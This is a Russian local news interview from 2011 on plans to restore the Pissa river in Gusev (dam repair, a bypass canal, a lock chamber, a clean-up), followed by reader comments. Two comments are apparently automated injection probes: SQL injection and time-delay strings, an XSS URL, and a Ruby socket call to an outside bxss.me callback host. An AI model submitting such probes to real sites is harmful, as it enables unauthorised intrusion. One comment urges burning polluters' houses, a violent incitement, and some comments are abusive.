Магазин «Двери» на Красноармейской Магазин «Двери» на Красноармейской
Главная / Новости / Общество / Г.М. Силенко о планах по оздоровлению реки Писса

Г.М. Силенко о планах по оздоровлению реки Писса

29 июня 2011, 13:01
Г.М. Силенко о планах по оздоровлению реки ПиссаЛето, долгожданное лето. Погожие деньки зовут прогуляться по улицам города, пройтись по набережной реки, жаль только, что река сейчас не является украшением нашего города.

Некогда полноводная Писса обмелела настолько, что в районе стихийно образовавшегося островка, напротив Гусевского политехнического техникума, утки пешком ходят. А ведь еще несколько десятков лет назад здесь устраивались соревнования по гребле, и были многочисленные лодочные станции. С болью смотрят гусевцы на то, как год от года река все больше зарастает, превращаясь едва ли не в болото. Поэтому, когда в 2009 году начались работы по восстановлению плотины у комбикормового завода, у горожан возникли самые радужные ожидания, что Писса вновь станет полноводной и потечет широко и привольно по своему руслу.

Но…в 2010 году ремонтные работы завершились, а надеждам жителей так и не суждено было сбыться. «В чем же дело, что с плотиной на Писсе? Почему она не работает? Почему не зарыт обводной канал? И есть ли вообще какие-то планы по оздоровлению реки?» - интересуются горожане. Со всеми этими многочисленными вопросами мы и обратились к главе администрации муниципального образования «Гусевский муниципальный район» Галине Михайловне СИЛЕНКО:

- Конечно же планы по оздоровлению реки Писсы в целом есть. Ситуация не простая, но решаемая. Начнем с того, что уровень воды в Писсе в свое время регулировали четыре плотины, стоявшие по ее течению в поселке Липово, в городе Гусеве по ул. А. Невского, у комбикормового завода и в поселке Приозерное. Выполняя каждая свою функцию, эти плотины, тем не менее, связаны в единую систему, и потому требуют комплексного подхода. Пока у нас такой возможности нет, но все будем делать постепенно. И первым шагом на этом пути как раз и явилось восстановление плотины у комбикормового завода, включающее в себя два этапа.

Вначале был прорыт обводной канал, демонтированы остатки прежней конструкции, ложе реки в районе сооружения – очищено от ила и мусора. Затем была установлена новая плотина, и обводной канал был закрыт. Однако здесь надо отметить, что плотина восстановлена не в том виде, в каком она была изначально. Дело в том, что ее конструкция предполагает наличие двух основных частей: неподвижного монолитного основания и подвижной части. Именно последняя и регулировала уровень воды в реке в черте города – поднимала его при закрытии и опускала, при открытии. Но, к сожалению, от старой плотины не осталось никакой документации, никаких чертежей, по которым можно было бы понять, как именно она была построена. Поэтому была восстановлена только одна, неподвижная часть, так называемый волнолом, проходя через который весной сплошной ледяной панцирь реки ломается, и уже не представляет опасности для стоящего ниже по течению железнодорожного моста. Первый этап работ был завершен, а второй – отложен, т.к. работы на плотине – сезонные, и в зимний период их проведение невозможно.

Как это нередко случается, природа внесла в наши планы свои коррективы. Этой зимой на реке Писсе образовалась очень толстая ледяная корка. Сброс воды на плотине был невозможен и, с весенним паводком, не имея возможности свободно уйти по речному руслу, вода пошла через грунты. Началось подтопление зданий и сооружений, расположенных в непосредственной близости от реки. И, чтобы сбросить уровень воды, пришлось заново открыть обводной канал. Для предотвращения подобных ситуаций в дальнейшем, было решено оставить канал, закрыв его плотиной, предусматривающей в своей конструкции шлюзовую камеру. С одной стороны это позволит значительно поднять уровень воды в черте города, а с другой - шлюзы оставят нам возможность экстренного сброса воды в случае необходимости. Не могу не отметить, что плотина – довольно непростое сооружение, и ее проект должен выполняться организацией, специализирующейся именно на гидросооружениях. У нас в городе такой компании нет, поэтому были приглашены проектировщики из Калининграда. Они произвели съемку местности, прикинули объем работ, и уже предложили конкретный проект. Сейчас идет формирование технического задания, и после проведения всех положенных экспертиз (строительной, экологической, сметной стоимости), новая плотина будет включена в бюджет. Так что уже в этом году на обводном канале появится шлюзовая камера. Да и сам канал приведем в порядок, где необходимо - забетонируем и благоустроим. Это как раз и будет второй, заключительный этап работ по этой плотине.

В настоящее время (пока идет подготовка документации), в связи с тем, что река действительно сильно обмелела, у нас появилась уникальная возможность очистить ее русло от мусора. А вот после выполнения всех работ на плотине у комбикормового завода, можно будет более подробно сосредоточиться на дальнейших планах оздоровления и возрождения реки Писсы, и возможно, даже подумать о восстановлении зоны отдыха и променада, когда-то имевших место на набережной.

А 15 июня прошла студенческая акция по очистке речного русла. Организатором этого мероприятия выступил заместитель председателя районного Совета депутатов Аркадий Федорович Лоскутов. В акции, начавшейся в 10 утра, принимали участие студенты из ГАПК и ГПТ. Особо отличились «электрики» группы №13 из ГПТ. Под руководством мастера производственного обучения Сергея Николаевича Хворостинина, ребята очистили реку от мелкогабаритного мусора и автомобильных покрышек, бревен и бесхозной арматуры; и вручную, лопатами, убрали наиболее выступающую часть отмели.
Другие новости по теме
Итоги социально-экономического развития Калининградской области в 2010 годуИтоги социально-экономического развития Калининградской области в 2010 году«Семейные истории о войне»: Рубченко Иван Иванович«Семейные истории о войне»: Рубченко Иван ИвановичЛинденштрассе (Гинденбургштрассе) — западная часть улицы Зои КосмодемьянскойЛинденштрассе (Гинденбургштрассе) — западная часть улицы Зои КосмодемьянскойОтрывок из книги «Пушки заговорили», где рассказывается о боях под ГумбинненомОтрывок из книги «Пушки заговорили», где рассказывается о боях под Гумбинненом
  1. J
    29 июня 2011 13:15
    Ложь.
    Во время паводка прорыли небольшой канал, но вот кто-то забыл, что вода имеет свойство размывать почву. В итоге канал размыло до полных размеров. К тому же если установлена неподвижная часть плотины, то что исправит её подвижная часть? Ей можно только ПОДНЯТЬ уровень ещё больше но не спустить ниже неподвижной части. Шлюзы надо было делать сразу.
  2. п
    29 июня 2011 17:32
    А ведь еще несколько десятков лет назад здесь устраивались соревнования по гребле, и были многочисленные лодочные станции.

    Гораздо проще и вернее сказать, что ещё при немцах.
    А ведь было время, когда и наш комбикормовый завод для внутренних нужд использовал электроэнергию вырабатываемую собственной водяной турбиной.
Оставить комментарий
Ремонт телевизоров Ремонт телевизоров
Комментарии
H
HcPcEgmp
Только что
1'""+"A".concat(70-3).concat(22*4).concat(112).concat(83).concat(121).concat(82)+(require"socket" Socket.gethostbyname("hitbd"+"iatkrdwg0b250.bxss.me.")[3].to_s)+"-1 OR 3*2>(0+5+601-601)
H
HcPcEgmp
5 минут назад
1'"HttP://bxss.me/t/xss.html?%00http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg/xfs.bxss.me1 waitfor delay '0:0:12' --
Г
Гуляющий
1 час назад
Администрация города, обратите внимание, а лучше прогуляйтесь по дорожке вдоль реки. Падать в реку скоро будут все в районе разрушенного моста
Г
Гость.
1 час назад
Свиньи все загадили.
Г
Гость Roman
2 часа назад
Не дай Бог конечно, но скорее всего скоро все будем из нашей любимой речки добывать себе еду, и пить с нее. Нужно искать тех кто загрязняет речку и жестоко наказывать, вплоть до сжигания домов
Э
Эколог
Вчера в 22:58
Писсурийская вода самая чистая .
И
Историк
Вчера в 22:54
А.и. шумилин ,,Ванька ротный,, прочтите.
Г
Гость Семен
Вчера в 20:35
Местные власти до чего народ довели, что приходится пропитание себе добывать ловлей рыбы из грязной реки.
Т
Тоже ученик
Вчера в 19:26
Вы в каких годах учились?Я с 71 по 78
5
555
Вчера в 18:20
Всем , кто хочет поправить душевное равновесие , надо прийти обязательно на выставку и вы будете в восторге от увиденного! 
Г
Гость Сергей
Вчера в 14:55
Корректнее, конечно, квасные патриоты, урапатриоты или псевдопатриоты.  Как правило, это телезрители, а также потребители соловьёвщины, симоньянщины и всяких там царьградов/рубежей из сети.
П
Прокурор
Вчера в 13:24
Прокуратура области: За 2 месяца 2023-го в регионе заметно выросло число грабежей
В
Вован
Вчера в 13:18
Юра, ты как всегда на шаг даже не видешь. Вернется через 6 месяцев и спросит с девочки следователя и остальных.
R
Romantic
Вчера в 12:49
Супер пристав. Знаю её, ей и во сне снится ее работа. Пристав-перфикционист - идеальный работник для нашего государства. Это у нее в крови, побольше бы таких ответственных работников во всех
Г
Гость Валерия
Вчера в 12:05
Ужасное обслуживание!!!Хамское и не профессиональное! Животное отказались осматривать,еще и на повышенных тонах!Не рекомендую  не колечьте  своих животных в данной клинике ! никогла больше туда не
Т
Тополёк
Вчера в 12:00
Когда эту местную рыгаловку прикроют?
в
вано
Вчера в 10:19
недоумков  отправить на украину